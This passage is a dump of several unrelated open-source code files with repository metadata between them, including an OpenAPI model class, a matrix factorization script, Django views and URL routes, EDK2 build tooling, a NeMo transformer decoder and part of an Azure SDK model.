Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'methods': 'list[WaasMethod]',
'path': 'str'
}
attribute_map = {
'methods': 'methods',
'path': 'path'
}
def __init__(self, methods=None, path=None, local_vars_configuration=None): # noqa: E501
"""WaasPath - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._methods = None
self._path = None
self.discriminator = None
if methods is not None:
self.methods = methods
if path is not None:
self.path = path
@property
def methods(self):
"""Gets the methods of this WaasPath. # noqa: E501
Supported operations for the path (e.g., PUT, GET, etc.). # noqa: E501
:return: The methods of this WaasPath. # noqa: E501
:rtype: list[WaasMethod]
"""
return self._methods
@methods.setter
def methods(self, methods):
"""Sets the methods of this WaasPath.
Supported operations for the path (e.g., PUT, GET, etc.). # noqa: E501
:param methods: The methods of this WaasPath. # noqa: E501
:type methods: list[WaasMethod]
"""
self._methods = methods
@property
def path(self):
"""Gets the path of this WaasPath. # noqa: E501
Relative path to an endpoint such as \\\"/pet/{petId}\\\". # noqa: E501
:return: The path of this WaasPath. # noqa: E501
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""Sets the path of this WaasPath.
Relative path to an endpoint such as \\\"/pet/{petId}\\\". # noqa: E501
:param path: The path of this WaasPath. # noqa: E501
:type path: str
"""
self._path = path
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WaasPath):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, WaasPath):
return True
return self.to_dict() != other.to_dict()
|
[
"aakatev@virtru.com"
] |
aakatev@virtru.com
|
a536bdcbf7d2e262cdcd57fb7576a6c706c7c063
|
fcbf910c46991955159a11a34573d3bbb2c8bb90
|
/test/serial/mf_mapping.py
|
fa9f5612f9e55757f82782376fecec5ea9607cbd
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
xunzhang/paracel
|
59114aa63e46b844e56e1089dae633e55150875a
|
553598a1f4c942c80157adfc23c2cd3fe0dab333
|
refs/heads/develop
| 2020-05-19T08:57:50.643425
| 2015-06-14T16:44:49
| 2015-06-14T16:44:49
| 14,230,290
| 13
| 3
| null | 2014-12-09T16:24:44
| 2013-11-08T10:37:14
|
C++
|
UTF-8
|
Python
| false
| false
| 3,221
|
py
|
#! /usr/bin/env python
#
# Matrix factorization with bias
#
import numpy as np
class mf():
def __init__(self, k = 100, rounds = 10, alpha = 0.001, beta = 0.01, train_fn = '', pred_fn = '', output = ''):
self.k = k
self.rounds = rounds
self.alpha = alpha
self.beta = beta
self.train_fn = train_fn
self.pred_fn = pred_fn
self.output = output
self.usr_dct = {}
self.item_dct = {}
self.rating_graph = {}
self.rating_sz = 0
self.miu = 0.
self.rmse = 0.
self.p = None
self.q = None
self.usr_bias = None
self.item_bias = None
def load(self):
f = open(self.train_fn)
for line in f:
uid, iid, rating = line.strip('\n').split(',')
rating = float(rating)
if uid not in self.usr_dct:
self.usr_dct[uid] = len(self.usr_dct)
if iid not in self.item_dct:
self.item_dct[iid] = len(self.item_dct)
self.rating_graph.setdefault(self.usr_dct[uid], []).append((self.item_dct[iid], rating))
self.rating_sz += 1
self.miu += rating
self.miu /= self.rating_sz
f.close()
def estimate(self, i, j):
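    # biased matrix-factorization prediction:
    # r_hat(i, j) = miu + usr_bias[i] + item_bias[j] + p[i] . q[j]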
return self.miu + self.usr_bias[i] + self.item_bias[j] + np.dot(self.p[i, :], self.q[j, :])
def cal_rmse(self):
import math
self.rmse = 0.
for u_indx, pair in self.rating_graph.iteritems():
for i_indx, rating in pair:
self.rmse += (rating - self.estimate(u_indx, i_indx)) ** 2
return math.sqrt(self.rmse / self.rating_sz)
def learning(self):
#import time
self.p = np.random.rand(len(self.usr_dct), self.k)
self.q = np.random.rand(len(self.item_dct), self.k)
self.usr_bias = np.random.rand(len(self.usr_dct))
self.item_bias = np.random.rand(len(self.item_dct))
# learning
for rd in xrange(self.rounds):
#start = time.time()
for u_indx, pair in self.rating_graph.iteritems():
for i_indx, rating in pair:
e = rating - self.estimate(u_indx, i_indx)
# compute delta
delta_p = self.alpha * (2 * e * self.q[i_indx, :] - self.beta * self.p[u_indx, :])
delta_q = self.alpha * (2 * e * self.p[u_indx, :] - self.beta * self.q[i_indx, :])
delta_ubias = self.alpha * (2 * e - self.beta * self.usr_bias[u_indx])
delta_ibias = self.alpha * (2 * e - self.beta * self.item_bias[i_indx])
# update with delta
self.p[u_indx, :] += delta_p
self.q[i_indx, :] += delta_q
self.usr_bias[u_indx] += delta_ubias
self.item_bias[i_indx] += delta_ibias
def solve(self):
self.load()
self.learning()
def predict_rating(self):
f1 = open(self.pred_fn)
f2 = open(self.output, 'w')
for line in f1:
uid, iid = line.strip('\n').split(',')
u_indx = self.usr_dct[uid]
i_indx = self.item_dct[iid]
pred_rating = self.estimate(u_indx, i_indx)
f2.write('%s,%s,%s\n' % (uid, iid, pred_rating))
f1.close()
f2.close()
if __name__ == '__main__':
mf_solver = mf(k = 80, rounds = 3, alpha = 0.005, beta = 0.02, train_fn = '/mfs/user/wuhong/paracel/test/serial/training.csv', pred_fn = '/mfs/alg/Rec_Competition/predict.csv', output = '/mfs/user/wuhong/paracel/test/serial/mf_result')
mf_solver.solve()
print mf_solver.cal_rmse()
mf_solver.predict_rating()
|
[
"xunzhangthu@gmail.com"
] |
xunzhangthu@gmail.com
|
cb02f43cde2d805ac8b14cabc69256dfad851d6a
|
fec36e7493a78575cd0320bf31c5080649863a06
|
/src/views/feature_value/list.py
|
2294b96b083b882991877221f5e144dc233b810e
|
[] |
no_license
|
teimurjan/eye8-backend
|
6f44e830dd17dcac8b23acc3b66b9918357f643b
|
bf0a4c894a5b3770fada269d8b4d7d72367ab1ba
|
refs/heads/master
| 2023-06-30T01:34:38.358903
| 2021-06-23T10:06:29
| 2021-06-23T10:06:29
| 273,144,546
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,287
|
py
|
from src.validation_rules.feature_value.create import (
CreateFeatureValueData,
CreateFeatureValueDataValidator,
)
from typing import Type
from src.serializers.feature_value import FeatureValueSerializer
from src.constants.status_codes import OK_CODE
from src.errors import InvalidEntityFormat
from src.services.feature_value import FeatureValueService
from src.views.base import PaginatableView, ValidatableView
class FeatureValueListView(ValidatableView[CreateFeatureValueData], PaginatableView):
def __init__(
self,
validator: CreateFeatureValueDataValidator,
service: FeatureValueService,
serializer_cls: Type[FeatureValueSerializer],
):
super().__init__(validator)
self._service = service
self._serializer_cls = serializer_cls
def get(self, request):
pagination_data = self._get_pagination_data(request)
meta = None
feature_values = []
if pagination_data:
feature_values, count = self._service.get_all(
offset=pagination_data["offset"], limit=pagination_data["limit"]
)
meta = self._get_meta(
count, pagination_data["page"], pagination_data["limit"]
)
else:
feature_values, _ = self._service.get_all()
raw_intl = request.args.get("raw_intl") == "1"
serialized_feature_values = [
self._serializer_cls(feature_value)
.in_language(None if raw_intl else request.language)
.with_serialized_feature_type()
.serialize()
for feature_value in feature_values
]
return {"data": serialized_feature_values, "meta": meta}, OK_CODE
def post(self, request):
try:
valid_data = self._validate(request.get_json())
feature_value = self._service.create(valid_data, user=request.user)
serialized_feature_value = (
self._serializer_cls(feature_value)
.with_serialized_feature_type()
.serialize()
)
return {"data": serialized_feature_value}, OK_CODE
except self._service.FeatureTypeInvalid:
raise InvalidEntityFormat({"feature_type_id": "errors.invalidID"})
|
[
"teymurgg321@gmail.com"
] |
teymurgg321@gmail.com
|
3901eb30debbc1c94cf3d40f80aa71a9a4ffbaa1
|
0b514feea82eaa2e341130d9e23d13d72271d644
|
/2.Jump_to_python/Python07.py
|
99deebb9aeec73d60845d030c9ca5481a5b33cec
|
[] |
no_license
|
Jerrykim91/FromZero
|
f8478012130948a11978a46ab6ec7922cb354a8f
|
fdd5a0716b29c77019cfcd1e1eab7ed4afd1aed4
|
refs/heads/master
| 2022-12-25T15:04:22.656462
| 2020-10-10T14:35:06
| 2020-10-10T14:35:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,514
|
py
|
# Modularization + packages
# + importing modules, placing test code, importing modules, using packages
# Module
# A file that collects functions, variables, or classes.
# => a file with the .py extension
# mod.py, __init__.py, p1.py, p2.py, ...
# import module_name
# module_name.function; to drop the module name -> from module_name import function
# from mod1 import *  -> * means "everything"
# Targets of modularization => variables, functions, classes <= imported elements can be used as if they were your own
# Package
# A directory grouping related functionality: utilities, networking, GUI, and so on
# Inside a package folder, __init__.py is needed for backwards compatibility on Python 3.3 and earlier.
# Also, __init__.py stands for the package itself
#-------------------------------
# from package.package....module import variables, functions, classes (list what you need)
from a.b.mod import PI, add
print(PI)
print(add(1,2))
# from package.package import variable, function, class
# this imports from the __init__.py inside the last package (directory) on the path
from a.b import PI2 as pi2 # rename PI2 -> pi2
print(pi2)
# A package name must never contain a dot!!
# A module name must never contain a dot!!
from a import PI3
print(PI3)
# Alias => when a name is too long, or you want to use it under a different name
# original_name as alias
from a import PI3 as pi
print(pi)
# Too many modules to import one by one? To bring in everything => *
# for backwards compatibility:
# __all__=['mod']
from a.b import *
print( mod.PI, PI2 )
# when using a plain import
import a.b.mod as m
print( m.PI )
import a.b as bm
print( bm.PI2 )
# Importing a module is effectively executing it -> it must be loaded into memory,
# so for a module you wrote yourself, unintended code may run on import
# => code written only for testing must not actually run when the module is imported
# => this needs handling => handle it with __name__
# A module using __name__ reports "__main__" when run directly,
# and reports its module name when used as a module (i.e., imported by another module)
from Python08 import XMan
mu = XMan( '로건2', 100, 50, 51)
print( mu )
print('Python07 : __name__', __name__)
|
[
"sun4131@gmail.com"
] |
sun4131@gmail.com
|
94d03e9f0f7b8cec3c47cc368593566e2ada6fad
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_magnesia.py
|
9193757fb3463cb627d30a16deadeb1b54c32ebb
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 327
|
py
|
# class header
class _MAGNESIA():
def __init__(self,):
self.name = "MAGNESIA"
self.definitions = [u'a white substance used in stomach medicines']
self.parents = []
  self.children = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
34b0a3903fbab558986e74b115ebb5bf14cae7a3
|
7c857119fe1505b1d80d6e62969661c06dc1a2f4
|
/BaseTools/Source/Python/GenFds/VerSection.py
|
7280e80cb4ef7ce47524af2de67a3c2e84cf5a33
|
[
"BSD-2-Clause"
] |
permissive
|
CloverHackyColor/CloverBootloader
|
7042ca7dd6b513d22be591a295e49071ae1482ee
|
2711170df4f60b2ae5aa20add3e00f35cf57b7e5
|
refs/heads/master
| 2023-08-30T22:14:34.590134
| 2023-08-27T19:14:02
| 2023-08-27T19:14:02
| 205,810,121
| 4,734
| 770
|
BSD-2-Clause
| 2023-09-03T12:41:33
| 2019-09-02T08:22:14
|
C
|
UTF-8
|
Python
| false
| false
| 2,917
|
py
|
## @file
# process Version section generation
#
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import absolute_import
from .Ffs import SectionSuffix
import Common.LongFilePathOs as os
from .GenFdsGlobalVariable import GenFdsGlobalVariable
from CommonDataClass.FdfClass import VerSectionClassObject
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.DataType import SUP_MODULE_SEC
## generate version section
#
#
class VerSection (VerSectionClassObject):
## The constructor
#
# @param self The object pointer
#
def __init__(self):
VerSectionClassObject.__init__(self)
## GenSection() method
#
# Generate version section
#
# @param self The object pointer
# @param OutputPath Where to place output file
# @param ModuleName Which module this section belongs to
# @param SecNum Index of section
# @param KeyStringList Filter for inputs of section generation
# @param FfsInf FfsInfStatement object that contains this section data
# @param Dict dictionary contains macro and its value
# @retval tuple (Generated file name, section alignment)
#
def GenSection(self, OutputPath, ModuleName, SecNum, KeyStringList, FfsInf=None, Dict=None, IsMakefile = False):
#
# Prepare the parameter of GenSection
#
if FfsInf:
self.Alignment = FfsInf.__ExtendMacro__(self.Alignment)
self.BuildNum = FfsInf.__ExtendMacro__(self.BuildNum)
self.StringData = FfsInf.__ExtendMacro__(self.StringData)
self.FileName = FfsInf.__ExtendMacro__(self.FileName)
OutputFile = os.path.join(OutputPath,
ModuleName + SUP_MODULE_SEC + SecNum + SectionSuffix.get('VERSION'))
OutputFile = os.path.normpath(OutputFile)
# Get String Data
StringData = ''
if self.StringData:
StringData = self.StringData
elif self.FileName:
if Dict is None:
Dict = {}
FileNameStr = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FileName)
FileNameStr = GenFdsGlobalVariable.MacroExtend(FileNameStr, Dict)
FileObj = open(FileNameStr, 'r')
StringData = FileObj.read()
StringData = '"' + StringData + '"'
FileObj.close()
GenFdsGlobalVariable.GenerateSection(OutputFile, [], 'EFI_SECTION_VERSION',
Ver=StringData, BuildNumber=self.BuildNum, IsMakefile=IsMakefile)
OutputFileList = []
OutputFileList.append(OutputFile)
return OutputFileList, self.Alignment
|
[
"isakov-sl@bk.ru"
] |
isakov-sl@bk.ru
|
b197dbe5eb039338439bb8c6b3e6fb20f0f80e18
|
db1247a3999e3f22db025639d09a605082ded89d
|
/grid/urls.py
|
4da7303e5324e7da6e0f39e3e8d1faa61df9ca6a
|
[
"MIT"
] |
permissive
|
wise-team/hiveprojects.io
|
1614deb0e4df5fe19cf62dbdb4d8d2741173c6b0
|
96e15a53f02c7327fe982a06b2dce56cd130e38c
|
refs/heads/master
| 2022-12-12T18:44:35.221892
| 2020-03-27T21:50:03
| 2020-03-27T21:50:03
| 248,597,914
| 5
| 1
|
MIT
| 2022-11-22T01:59:55
| 2020-03-19T20:24:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,093
|
py
|
"""grid url patterns"""
from django.conf.urls import url
from grid import views
from grid.views import (
add_feature,
add_grid,
add_grid_package,
add_new_grid_package,
ajax_grid_list,
delete_feature,
delete_grid_package,
edit_element,
edit_grid,
edit_feature,
grid_detail,
grids
)
urlpatterns = [
url(
regex='^add/$',
view=add_grid,
name='add_grid',
),
url(
        regex=r'^(?P<slug>[-\w]+)/edit/$',
view=edit_grid,
name='edit_grid',
),
url(
        regex=r'^element/(?P<feature_id>\d+)/(?P<package_id>\d+)/$',
view=edit_element,
name='edit_element',
),
url(
        regex=r'^feature/add/(?P<grid_slug>[a-z0-9\-\_]+)/$',
view=add_feature,
name='add_feature',
),
url(
        regex=r'^feature/(?P<id>\d+)/$',
view=edit_feature,
name='edit_feature',
),
url(
        regex=r'^feature/(?P<id>\d+)/delete/$',
view=delete_feature,
name='delete_feature',
),
url(
        regex=r'^package/(?P<id>\d+)/delete/$',
view=delete_grid_package,
name='delete_grid_package',
),
url(
        regex=r'^(?P<grid_slug>[a-z0-9\-\_]+)/package/add/$',
view=add_grid_package,
name='add_grid_package',
),
url(
        regex=r'^(?P<grid_slug>[a-z0-9\-\_]+)/package/add/new$',
view=add_new_grid_package,
name='add_new_grid_package',
),
url(
regex='^ajax_grid_list/$',
view=ajax_grid_list,
name='ajax_grid_list',
),
url(
regex='^$',
view=grids,
name='grids',
),
url(
        regex=r'^g/(?P<slug>[-\w]+)/$',
view=grid_detail,
name='grid',
),
url(
        regex=r'^g/(?P<slug>[-\w]+)/landscape/$',
view=views.grid_detail_landscape,
name='grid_landscape',
),
    url(regex=r'^g/(?P<slug>[-\w]+)/timesheet/$',
view=views.grid_timesheet,
name='grid_timesheet'
)
]
|
[
"noisy.pl@gmail.com"
] |
noisy.pl@gmail.com
|
c5ad1b5d232b6458e70b9d7459d2978fcf989724
|
1bde114a847c629701e3acd004be5788594e0ef1
|
/Examples/PatternRefactoring/trashvisitor/Visitor.py
|
29bc5089c2ffa37d3322ce93d7a97ca546f4a1f4
|
[] |
no_license
|
BruceEckel/ThinkingInPython
|
0b234cad088ee144bb8511e1e7db9fd5bba78877
|
76a1310deaa51e02e9f83ab74520b8269aac6fff
|
refs/heads/master
| 2022-02-21T23:01:40.544505
| 2022-02-08T22:26:52
| 2022-02-08T22:26:52
| 97,673,620
| 106
| 33
| null | 2022-02-08T22:26:53
| 2017-07-19T04:43:50
|
Python
|
UTF-8
|
Python
| false
| false
| 215
|
py
|
# PatternRefactoring/trashvisitor/Visitor.py
# The base class for visitors.
class Visitor:
    # Python has no method overloading, so the Java-style visit(Aluminum a),
    # visit(Paper p), ... signatures become one hook per trash type.
    def visit_aluminum(self, a): pass
    def visit_paper(self, p): pass
    def visit_glass(self, g): pass
    def visit_cardboard(self, c): pass
|
[
"mindviewinc@gmail.com"
] |
mindviewinc@gmail.com
|
d8efecb43d9198e3dd2221f4e39fb241646378fc
|
0032d988541e85c47b5034c20ecf88220dde5a95
|
/openbook_posts/migrations/0026_auto_20190414_1620.py
|
242d6b7b2f6ad2429773288abeaee56f0fb9ccf8
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
OkunaOrg/okuna-api
|
eabd37fef9d2be59b590ed8d72bee084ac377997
|
f87d8e80d2f182c01dbce68155ded0078ee707e4
|
refs/heads/master
| 2022-02-04T21:31:10.577601
| 2021-12-28T18:20:39
| 2021-12-28T18:20:39
| 151,052,951
| 185
| 92
|
MIT
| 2022-01-13T01:00:40
| 2018-10-01T07:44:46
|
Python
|
UTF-8
|
Python
| false
| false
| 444
|
py
|
# Generated by Django 2.2 on 2019-04-14 14:20
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('openbook_posts', '0025_post_is_edited'),
]
operations = [
migrations.AlterField(
model_name='post',
name='uuid',
field=models.UUIDField(db_index=True, default=uuid.uuid4, editable=False, unique=True),
),
]
|
[
"joel@open-book.org"
] |
joel@open-book.org
|
a9194341e115335348649466389655b10bc7ccd4
|
caa05194b8f11f29a19767c94fdc93628be694d5
|
/nemo/collections/nlp/modules/common/transformer/transformer_decoders.py
|
910a7104ea24d2870a596d91e46359933d887e99
|
[
"Apache-2.0"
] |
permissive
|
Jimmy-INL/NeMo
|
a589ab0ab97b9ccb8921579670e80c470ce7077b
|
6a3753b3013dc92a3587853d60c5086e2e64d98f
|
refs/heads/main
| 2023-04-02T22:28:29.891050
| 2021-04-13T18:22:24
| 2021-04-13T18:22:24
| 357,681,603
| 1
| 0
|
Apache-2.0
| 2021-04-13T20:34:12
| 2021-04-13T20:34:12
| null |
UTF-8
|
Python
| false
| false
| 8,169
|
py
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from dataclasses import dataclass
import torch
import torch.nn as nn
from omegaconf.omegaconf import MISSING
from nemo.collections.common.parts import form_attention_mask
from nemo.collections.nlp.modules.common.transformer.transformer_modules import MultiHeadAttention, PositionWiseFF
__all__ = ["TransformerDecoder"]
class TransformerDecoderBlock(nn.Module):
"""
Building block of Transformer decoder.
Args:
hidden_size: size of the embeddings in the model, also known as d_model
inner_size: number of neurons in the intermediate part of feed-forward
net, usually is (4-8 x hidden_size) in the papers
num_attention_heads: number of heads in multi-head attention
attn_score_dropout: probability of dropout applied to attention scores
attn_layer_dropout: probability of dropout applied to the output of the
attention layers, but before layer normalization
ffn_dropout: probability of dropout applied to FFN output
hidden_act: activation function used between two linear layers in FFN
"""
def __init__(
self,
hidden_size: int,
inner_size: int,
num_attention_heads: int = 1,
attn_score_dropout: float = 0.0,
attn_layer_dropout: float = 0.0,
ffn_dropout: float = 0.0,
hidden_act: str = "relu",
pre_ln: bool = False,
):
super().__init__()
self.pre_ln = pre_ln
self.layer_norm_1 = nn.LayerNorm(hidden_size, eps=1e-5)
self.first_sub_layer = MultiHeadAttention(
hidden_size, num_attention_heads, attn_score_dropout, attn_layer_dropout
)
self.layer_norm_2 = nn.LayerNorm(hidden_size, eps=1e-5)
self.second_sub_layer = MultiHeadAttention(
hidden_size, num_attention_heads, attn_score_dropout, attn_layer_dropout
)
self.layer_norm_3 = nn.LayerNorm(hidden_size, eps=1e-5)
self.third_sub_layer = PositionWiseFF(hidden_size, inner_size, ffn_dropout, hidden_act)
def forward_preln(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
"""
Pre-LayerNorm block
Order of operations: LN -> Self-Attn -> Residual -> LN -> Cross-Attn -> Residual -> LN -> FFN
"""
residual = decoder_query
decoder_query = self.layer_norm_1(decoder_query)
decoder_keys = self.layer_norm_1(decoder_keys)
self_attn_output = self.first_sub_layer(decoder_query, decoder_keys, decoder_keys, decoder_mask)
self_attn_output += residual
residual = self_attn_output
self_attn_output = self.layer_norm_2(self_attn_output)
enc_dec_attn_output = self.second_sub_layer(self_attn_output, encoder_states, encoder_states, encoder_mask)
enc_dec_attn_output += residual
residual = enc_dec_attn_output
enc_dec_attn_output = self.layer_norm_3(enc_dec_attn_output)
output_states = self.third_sub_layer(enc_dec_attn_output)
output_states += residual
return output_states
def forward_postln(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
"""
Post-LayerNorm block
Order of operations: Self-Attn -> Residual -> LN -> Cross-Attn -> Residual -> LN -> FFN -> Residual -> LN
"""
self_attn_output = self.first_sub_layer(decoder_query, decoder_keys, decoder_keys, decoder_mask)
self_attn_output += decoder_query
self_attn_output = self.layer_norm_1(self_attn_output)
enc_dec_attn_output = self.second_sub_layer(self_attn_output, encoder_states, encoder_states, encoder_mask)
enc_dec_attn_output += self_attn_output
enc_dec_attn_output = self.layer_norm_2(enc_dec_attn_output)
output_states = self.third_sub_layer(enc_dec_attn_output)
output_states += enc_dec_attn_output
return self.layer_norm_3(output_states)
def forward(self, decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask):
if self.pre_ln:
return self.forward_preln(decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask)
else:
return self.forward_postln(decoder_query, decoder_mask, decoder_keys, encoder_states, encoder_mask)
class TransformerDecoder(nn.Module):
def __init__(
self,
num_layers: int,
hidden_size: int,
inner_size: int,
num_attention_heads: int = 1,
attn_score_dropout: float = 0.0,
attn_layer_dropout: float = 0.0,
ffn_dropout: float = 0.0,
hidden_act: str = "relu",
pre_ln: bool = False,
):
super().__init__()
layer = TransformerDecoderBlock(
hidden_size,
inner_size,
num_attention_heads,
attn_score_dropout,
attn_layer_dropout,
ffn_dropout,
hidden_act,
pre_ln,
)
self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])
self.diagonal = 0
def _get_memory_states(self, decoder_states, decoder_mems_list=None, i=0):
if decoder_mems_list is not None:
memory_states = torch.cat((decoder_mems_list[i], decoder_states), dim=1)
else:
memory_states = decoder_states
return memory_states
def forward(
self, decoder_states, decoder_mask, encoder_states, encoder_mask, decoder_mems_list=None, return_mems=False
):
"""
Args:
decoder_states: output of the embedding layer (B x L_dec x H)
decoder_mask: decoder inputs mask (B x L_dec)
encoder_states: output of the encoder (B x L_enc x H)
encoder_mask: encoder inputs mask (B x L_enc)
decoder_mems_list: list of the cached decoder hidden states
for fast autoregressive generation which will be used instead
of decoder_states as keys and values if not None
return_mems: bool, whether to return outputs of all decoder layers
or the last layer only
"""
decoder_attn_mask = form_attention_mask(decoder_mask, diagonal=self.diagonal)
encoder_attn_mask = form_attention_mask(encoder_mask)
memory_states = self._get_memory_states(decoder_states, decoder_mems_list, 0)
cached_mems_list = [memory_states]
for i, layer in enumerate(self.layers):
decoder_states = layer(decoder_states, decoder_attn_mask, memory_states, encoder_states, encoder_attn_mask)
memory_states = self._get_memory_states(decoder_states, decoder_mems_list, i + 1)
cached_mems_list.append(memory_states)
if return_mems:
return cached_mems_list
else:
return cached_mems_list[-1]
def eval(self):
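        # Assumption (not documented here): at eval time decoding uses cached
        # memory states, so queries cover only new positions and the causal
        # diagonal mask can be dropped by setting it to None.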
self.diagonal = None
super().eval()
def train(self, mode=True):
if mode is True:
self.diagonal = 0
else:
self.diagonal = None
super().train(mode)
def input_example(self):
"""
Generates input examples for tracing etc.
Returns:
A tuple of input examples.
"""
sample = next(self.parameters())
input_ids = torch.randint(low=0, high=2048, size=(2, 16, 1024), device=sample.device)
encoder_mask = torch.randint(low=0, high=1, size=(2, 16), device=sample.device)
return tuple([input_ids, encoder_mask, input_ids, encoder_mask])
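# A hedged usage sketch (not part of the original module); shapes follow the
# forward() docstring above:
#   decoder = TransformerDecoder(num_layers=2, hidden_size=64, inner_size=256,
#                                num_attention_heads=4)
#   dec_states, dec_mask = torch.rand(2, 8, 64), torch.ones(2, 8)     # B x L_dec
#   enc_states, enc_mask = torch.rand(2, 16, 64), torch.ones(2, 16)   # B x L_enc
#   out = decoder(dec_states, dec_mask, enc_states, enc_mask)         # B x L_dec x H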
|
[
"noreply@github.com"
] |
Jimmy-INL.noreply@github.com
|
08541c40fee9474b87a66113054f486ea71f0e98
|
ba0e07b34def26c37ee22b9dac1714867f001fa5
|
/azure-mgmt-network/azure/mgmt/network/models/network_interface.py
|
fa19b8e2ad03dfa74bef269fdcb7d724b08d0661
|
[
"MIT"
] |
permissive
|
CharaD7/azure-sdk-for-python
|
b11a08ac7d24a22a808a18203072b4c7bd264dfa
|
9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c
|
refs/heads/master
| 2023-05-12T12:34:26.172873
| 2016-10-26T21:35:20
| 2016-10-26T21:35:20
| 72,448,760
| 1
| 0
|
MIT
| 2023-05-04T17:15:01
| 2016-10-31T15:14:09
|
Python
|
UTF-8
|
Python
| false
| false
| 4,531
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class NetworkInterface(Resource):
"""A NetworkInterface in a resource group.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource Id
:type id: str
:ivar name: Resource name
:vartype name: str
:ivar type: Resource type
:vartype type: str
:param location: Resource location
:type location: str
:param tags: Resource tags
:type tags: dict
:param virtual_machine: Gets or sets the reference of a VirtualMachine
:type virtual_machine: :class:`SubResource
<azure.mgmt.network.models.SubResource>`
:param network_security_group: Gets or sets the reference of the
NetworkSecurityGroup resource
:type network_security_group: :class:`NetworkSecurityGroup
<azure.mgmt.network.models.NetworkSecurityGroup>`
:param ip_configurations: Gets or sets list of IPConfigurations of the
network interface
:type ip_configurations: list of :class:`NetworkInterfaceIPConfiguration
<azure.mgmt.network.models.NetworkInterfaceIPConfiguration>`
:param dns_settings: Gets or sets DNS settings in network interface
:type dns_settings: :class:`NetworkInterfaceDnsSettings
<azure.mgmt.network.models.NetworkInterfaceDnsSettings>`
:param mac_address: Gets the MAC address of the network interface
:type mac_address: str
:param primary: Gets whether this is a primary NIC on a virtual machine
:type primary: bool
:param enable_ip_forwarding: Gets or sets whether IPForwarding is enabled
on the NIC
:type enable_ip_forwarding: bool
:param resource_guid: Gets or sets resource guid property of the network
interface resource
:type resource_guid: str
:param provisioning_state: Gets provisioning state of the PublicIP
resource Updating/Deleting/Failed
:type provisioning_state: str
:param etag: Gets a unique read-only string that changes whenever the
resource is updated
:type etag: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'virtual_machine': {'key': 'properties.virtualMachine', 'type': 'SubResource'},
'network_security_group': {'key': 'properties.networkSecurityGroup', 'type': 'NetworkSecurityGroup'},
'ip_configurations': {'key': 'properties.ipConfigurations', 'type': '[NetworkInterfaceIPConfiguration]'},
'dns_settings': {'key': 'properties.dnsSettings', 'type': 'NetworkInterfaceDnsSettings'},
'mac_address': {'key': 'properties.macAddress', 'type': 'str'},
'primary': {'key': 'properties.primary', 'type': 'bool'},
'enable_ip_forwarding': {'key': 'properties.enableIPForwarding', 'type': 'bool'},
